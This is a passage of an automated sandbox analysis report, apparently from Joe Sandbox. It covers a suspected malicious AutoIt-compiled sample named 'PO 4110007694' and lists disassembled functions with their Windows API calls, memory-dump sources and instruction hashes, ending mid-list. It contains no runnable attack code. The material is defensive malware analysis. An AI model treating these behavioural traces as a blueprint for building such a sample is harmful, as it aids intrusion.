                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1946975507-0
                                                                    • Opcode ID: 5ef4426c8c6865752711ab4c6c19ca9384c3345b36d7247a0ee591ae7f4bec5f
                                                                    • Instruction ID: 4219de152f88f9e5ac2e82b4b0be446f0854dbc1925e8c7a53b8bb72b30ff01a
                                                                    • Opcode Fuzzy Hash: 5ef4426c8c6865752711ab4c6c19ca9384c3345b36d7247a0ee591ae7f4bec5f
                                                                    • Instruction Fuzzy Hash: 0EE03031104144AADB215F64EC0D7DC3B20EB06332F10836BFA79880E187B14AA1DB51
                                                                    Function 00C68712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 00C6871B
                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C682E6), ref: 00C68722
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C682E6), ref: 00C6872F
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C682E6), ref: 00C68736
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3974789173-0
                                                                    • Opcode ID: 13adfc7f7131261c1fc1dcc6aacdc58425e15816358f2416e94140f389e9358d
                                                                    • Instruction ID: 18ed04cab9b7f8842b1b4b5ad31fd5c3c98c87205ba8ff1d218cd0ba968dd0b3
                                                                    • Opcode Fuzzy Hash: 13adfc7f7131261c1fc1dcc6aacdc58425e15816358f2416e94140f389e9358d
                                                                    • Instruction Fuzzy Hash: 73E086366112119BD7205FB05D4DB5E3BACEF54791F14482DB245C9050DA748456C750
                                                                    Function 00C6B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00C6B4BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ContainedObject
                                                                    • String ID: AutoIt3GUI$Container
                                                                    • API String ID: 3565006973-3941886329
                                                                    • Opcode ID: 641004269491dc31b6ef95f3c756d9a34f7e500c964aa5ce03ad8b82f04af14b
                                                                    • Instruction ID: 7f6e1e8b491d76efa16cc335b89bb033105f9cb686ef193977ef4e97ccaeaaec
                                                                    • Opcode Fuzzy Hash: 641004269491dc31b6ef95f3c756d9a34f7e500c964aa5ce03ad8b82f04af14b
                                                                    • Instruction Fuzzy Hash: 37913871600601AFDB24DF64C894BAAB7E9FF49710F20856DF94ACB2A1DB70ED81CB50
                                                                    Function 00C7AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • __wcsnicmp.LIBCMT ref: 00C7B02D
                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C7B0F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                    • String ID: LPT
                                                                    • API String ID: 3222508074-1350329615
                                                                    • Opcode ID: 46c38ace90942f3786e46c5bff38348d872f27a55f716a8b1940c0082d475c9f
                                                                    • Instruction ID: b72ae12764f14357d6795c61cd946fc962ede52bc71589e51b5c30e76bf8b37c
                                                                    • Opcode Fuzzy Hash: 46c38ace90942f3786e46c5bff38348d872f27a55f716a8b1940c0082d475c9f
                                                                    • Instruction Fuzzy Hash: B5617575A00219AFDB14DF54C895FEEB7B4EF09310F108069F91AAB291DB70AF85DB50
                                                                    Function 00C22957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00C22968
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C22981
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: b70f8d676d19e060566e16f2e83dc2a3627d8ae0c583869b1e9118f45f1debb2
                                                                    • Instruction ID: 4289524a2a9c9db2335bc3a816e0b08ba630470602989ed5ecc5f60e4fb9d3a1
                                                                    • Opcode Fuzzy Hash: b70f8d676d19e060566e16f2e83dc2a3627d8ae0c583869b1e9118f45f1debb2
                                                                    • Instruction Fuzzy Hash: C9513871418744ABE720EF10D886BEFBBE8FF86344F41885DF2D8411A1DB318569EB66
                                                                    Function 00C79734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C14F0B: __fread_nolock.LIBCMT ref: 00C14F29
                                                                    • _wcscmp.LIBCMT ref: 00C79824
                                                                    • _wcscmp.LIBCMT ref: 00C79837
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$__fread_nolock
                                                                    • String ID: FILE
                                                                    • API String ID: 4029003684-3121273764
                                                                    • Opcode ID: 73cf2b7483399f3475f87cfcfcc9e5f27723fa6f963cfb544ed5f799b376de92
                                                                    • Instruction ID: ee42e2c5a5ada3079313e3f181c15bf59ae02fa2664262f456c3c2600f44b806
                                                                    • Opcode Fuzzy Hash: 73cf2b7483399f3475f87cfcfcc9e5f27723fa6f963cfb544ed5f799b376de92
                                                                    • Instruction Fuzzy Hash: D741D571A00209BBDF249EE4CC45FEFBBBDDF86710F004069F904A7280DA719A45AB61
                                                                    Function 00C8258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C8259E
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C825D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_memset
                                                                    • String ID: |
                                                                    • API String ID: 1413715105-2343686810
                                                                    • Opcode ID: c3849abe75f26f8e3e0fe4856ae882497b88d6234f91426be78adfca4e5f4d6c
                                                                    • Instruction ID: ce195630bed5bcbaa2c55efd8bce3c0b9dfae4a9c895e2a5db34172ee6536857
                                                                    • Opcode Fuzzy Hash: c3849abe75f26f8e3e0fe4856ae882497b88d6234f91426be78adfca4e5f4d6c
                                                                    • Instruction Fuzzy Hash: 7A311D71800119EBCF11EFA1CC89EEEBFB8FF09314F100159F915A6161EB315996EB90
                                                                    Function 00C97A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C97B61
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C97B76
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: 346d294867a88a0f38c288de21a4193ab69b01987e7d6a5e979b07cf516347f9
                                                                    • Instruction ID: db2ff18d14d35aeb17a1309800ef99cd5f32fb4f43c4731de764f9f52fc25875
                                                                    • Opcode Fuzzy Hash: 346d294867a88a0f38c288de21a4193ab69b01987e7d6a5e979b07cf516347f9
                                                                    • Instruction Fuzzy Hash: E2411774A062099FDF14CF65C985BEEBBB5FB08300F10026AE904AB381D730AA51DF90
                                                                    Function 00C96A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00C96B17
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C96B53
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    • Opcode ID: 177d82229b3fac1db4166e3c1a0f5455a9f4839df53f8fbb4a3c7f6dfcaffc3d
                                                                    • Instruction ID: d780b827b6bc0f9eb0e8ea0f6b86bf122069799b3c5a81b705a71049fa8a86ed
                                                                    • Opcode Fuzzy Hash: 177d82229b3fac1db4166e3c1a0f5455a9f4839df53f8fbb4a3c7f6dfcaffc3d
                                                                    • Instruction Fuzzy Hash: F9318D71200604AEDF109F64CC84BFB73A9FF48760F108619F9A9D7190DB31AD92E760
                                                                    Function 00C728A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C72911
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C7294C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 270be9f7e1480cf2c17967ab7e11578faa4eb46bb8788c357eb8e6c2e4528f70
                                                                    • Instruction ID: 10e24410106bcee6bacecceff6be8fae3b25273c4a781ec34c8464768a34dff9
                                                                    • Opcode Fuzzy Hash: 270be9f7e1480cf2c17967ab7e11578faa4eb46bb8788c357eb8e6c2e4528f70
                                                                    • Instruction Fuzzy Hash: 0731E631A003059FEF24DF59DC45BAEBBF8FF45350F188019EAD9A61A0D7709A40DB51
                                                                    Function 00C839E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __snwprintf.LIBCMT ref: 00C83A66
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __snwprintf_memmove
                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                    • API String ID: 3506404897-2584243854
                                                                    • Opcode ID: d896b01a79809b50fdb65285ceede9071d1415f17c6253441458dd9c928777c8
                                                                    • Instruction ID: 57a6c3c9f690ab97bcd2377e5eaacf762b1f4b279b3f3c454b5e3e5a933ab4f4
                                                                    • Opcode Fuzzy Hash: d896b01a79809b50fdb65285ceede9071d1415f17c6253441458dd9c928777c8
                                                                    • Instruction Fuzzy Hash: 44219331600119AFCF14FFA4CC91EEE77B5AF45740F500468F445A7281DB34EA86EBA5
                                                                    Function 00C966D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C96761
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C9676C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: 8a2dd803ad027c1d0aab768f718106093f563c0e9e65c6459b97fb8046081f35
                                                                    • Instruction ID: 814f690ac96abcdd87066f09159f6a416c0beb112fbb0eb9a02e76bc982f0686
                                                                    • Opcode Fuzzy Hash: 8a2dd803ad027c1d0aab768f718106093f563c0e9e65c6459b97fb8046081f35
                                                                    • Instruction Fuzzy Hash: B811B271200208BFEF119F94DC88FFB376AEB493A8F114129F924972D0D6319D5197A0
                                                                    Function 00C96C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
                                                                      • Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
                                                                      • Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00C96C71
                                                                    • GetSysColor.USER32(00000012), ref: 00C96C8B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: bce20521d175b1ceb7dd467e612616eb5778566023e088163a52d0b6c25ee407
                                                                    • Instruction ID: be88aac1e909ddd468c8042d7a21d972948b0a74afffaa3796e68e5013f8fc01
                                                                    • Opcode Fuzzy Hash: bce20521d175b1ceb7dd467e612616eb5778566023e088163a52d0b6c25ee407
                                                                    • Instruction Fuzzy Hash: B8212972510209AFDF04DFA8CC49AFA7BA8FB08314F154629FD95D2250D635E861DB60
                                                                    Function 00C96920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00C969A2
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C969B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: c1614dbddcb9c77c1e112d9354c9fc78b9efe73089c019da48bbc98df346dd88
                                                                    • Instruction ID: e1e767756b5d361b798b73c28d5f58b2a6fefbf98c54e8ebbe3e2ec4379b72e2
                                                                    • Opcode Fuzzy Hash: c1614dbddcb9c77c1e112d9354c9fc78b9efe73089c019da48bbc98df346dd88
                                                                    • Instruction Fuzzy Hash: BB116A71510208ABEF109F649C48FEB37A9EB053B8F624728F9B5971E0C635DC91A760
                                                                    Function 00C729AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C72A22
                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C72A41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 1f2a2556a2297d6cc763bf7ac1a646c2293b28dc4e0f449d6afc87fb0b23a1cc
                                                                    • Instruction ID: 8324451a4ff0c47630ca8b77822833049f444d9bf7208b762ea79768511e5552
                                                                    • Opcode Fuzzy Hash: 1f2a2556a2297d6cc763bf7ac1a646c2293b28dc4e0f449d6afc87fb0b23a1cc
                                                                    • Instruction Fuzzy Hash: 7811C472D01114ABDF30DB99DC44BAEB7B8EB45320F158026E96DE7290D770EE0AE791
                                                                    Function 00C821D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C8222C
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C82255
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$OpenOption
                                                                    • String ID: <local>
                                                                    • API String ID: 942729171-4266983199
                                                                    • Opcode ID: 7dc911409ca9aa70a2e321b104d791f17a2cb6939a28938bc0dc9382be60f861
                                                                    • Instruction ID: e9b7d0f03d659e1b36fc0344ec38b2122036829aba3587c321cbbccd56930565
                                                                    • Opcode Fuzzy Hash: 7dc911409ca9aa70a2e321b104d791f17a2cb6939a28938bc0dc9382be60f861
                                                                    • Instruction Fuzzy Hash: FA11C670541225BADB25AF51CCCCFBBFBA8FF16769F10822AF51586000D2705955D7F4
                                                                    Function 00C68E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C68E73
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
